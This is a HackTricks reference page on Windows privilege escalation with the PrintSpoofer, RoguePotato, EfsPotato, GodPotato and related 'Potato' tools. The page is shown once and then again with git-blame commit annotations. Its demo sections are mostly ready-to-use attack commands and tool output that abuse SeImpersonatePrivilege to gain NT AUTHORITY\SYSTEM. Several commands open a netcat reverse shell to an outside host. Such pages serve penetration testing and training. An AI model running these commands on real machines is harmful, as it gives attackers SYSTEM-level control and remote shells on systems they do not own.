hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

{% hint style="warning" %}
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)**  can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
{% endhint %}

## Quick Demo

### PrintSpoofer

```bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------   

[+] Found privilege: SeImpersonatePrivilege                                        

[+] Named pipe listening...                                                        

[+] CreateProcessAsUser() OK                                                       

NULL

```

### RoguePotato

{% code overflow="wrap" %}
```bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
{% endcode %}

### SharpEfsPotato

```bash
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system
```

### EfsPotato

```bash
> EfsPotato.exe "whoami"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=aeee30)
[+] Get Token: 888
[!] process with pid: 3696 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818

nt authority\system
```

### GodPotato

```bash
> GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```

### DCOMPotato

![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)


## References

* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)


{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00			`# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
a 2024-07-19 14:09:38 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
a 2024-07-19 14:09:38 +00:00			`<details>`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
a 2024-07-19 14:09:38 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-02 18:28:04 +00:00
a 2024-07-19 14:09:38 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`</details>`
a 2024-07-19 14:09:38 +00:00			`{% endhint %}`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`{% hint style="warning" %}`
roguepotato-and-printspoofer.md: Addition of DCOMPotato 2024-07-24 15:01:23 +00:00			JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato), [GodPotato](https://github.com/BeichenDream/GodPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato), [DCOMPotato](https://github.com/zcgonvh/DCOMPotato) can be used to leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`{% endhint %}`

			`## Quick Demo`

			`### PrintSpoofer`

			```bash
			`c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"`

			`--------------------------------------------------------------------------------`

			`[+] Found privilege: SeImpersonatePrivilege`

			`[+] Named pipe listening...`

			`[+] CreateProcessAsUser() OK`

			`NULL`

			```

			`### RoguePotato`

GITBOOK-4151: change request with no subject merged in GitBook 2023-11-05 22:38:46 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			```bash
GITBOOK-4151: change request with no subject merged in GitBook 2023-11-05 22:38:46 +00:00			`c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999`
			`# In some old versions you need to use the "-f" param`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999`
			```
GITBOOK-4151: change request with no subject merged in GitBook 2023-11-05 22:38:46 +00:00			`{% endcode %}`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00			`### SharpEfsPotato`

roguepotato-and-printspoofer.md: Add bash syntax highlighting and '>' command input indicators 2024-07-16 21:14:19 +00:00			```bash
			`> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami \| Set-Content C:\temp\w.log"`
GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00			`SharpEfsPotato by @bugch3ck`
			`Local privilege escalation from SeImpersonatePrivilege using EfsRpc.`

			`Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.`

			`[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2`
			`df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:`
			`[x]RpcBindingSetAuthInfo failed with status 0x6d3`
			`[+] Server connected to our evil RPC pipe`
			`[+] Duplicated impersonation token ready for process creation`
			`[+] Intercepted and authenticated successfully, launching program`
			`[+] Process created, enjoy!`

			`C:\temp>type C:\temp\w.log`
			`nt authority\system`
			```

roguepotato-and-printspoofer.md: Add EfsPotato 2024-07-16 21:11:31 +00:00			`### EfsPotato`

roguepotato-and-printspoofer.md: Add bash syntax highlighting and '>' command input indicators 2024-07-16 21:14:19 +00:00			```bash
			`> EfsPotato.exe "whoami"`
roguepotato-and-printspoofer.md: Add EfsPotato 2024-07-16 21:11:31 +00:00			`Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).`
			`Part of GMH's fuck Tools, Code By zcgonvh.`
			`CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]`

			`[+] Current user: NT Service\MSSQLSERVER`
			`[+] Pipe: \pipe\lsarpc`
			`[!] binding ok (handle=aeee30)`
			`[+] Get Token: 888`
			`[!] process with pid: 3696 created.`
			`==============================`
			`[x] EfsRpcEncryptFileSrv failed: 1818`

			`nt authority\system`
			```

GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00			`### GodPotato`

roguepotato-and-printspoofer.md: Add bash syntax highlighting and '>' command input indicators 2024-07-16 21:14:19 +00:00			```bash
			`> GodPotato -cmd "cmd /c whoami"`
			`# You can achieve a reverse shell like this.`
			`> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"`
GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00			```

roguepotato-and-printspoofer.md: Addition of DCOMPotato 2024-07-24 15:01:23 +00:00			`### DCOMPotato`

			`![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)`


a 2024-02-08 03:06:37 +00:00			`## References`
GitBook: No commit message 2024-05-05 17:56:05 +00:00
a 2024-02-08 03:06:37 +00:00			`* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)`
			`* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)`
			`* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)`
			`* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)`
			`* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)`
roguepotato-and-printspoofer.md: Add EfsPotato 2024-07-16 21:11:31 +00:00			`* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)`
roguepotato-and-printspoofer.md: Addition of DCOMPotato 2024-07-24 15:01:23 +00:00			`* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)`
a 2024-02-08 03:06:37 +00:00
wi 2024-04-18 03:10:20 +00:00
a 2024-07-19 14:09:38 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
a 2024-07-19 14:09:38 +00:00			`<details>`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
a 2024-07-19 14:09:38 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-02 18:28:04 +00:00
a 2024-07-19 14:09:38 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`</details>`
a 2024-07-19 14:09:38 +00:00			`{% endhint %}`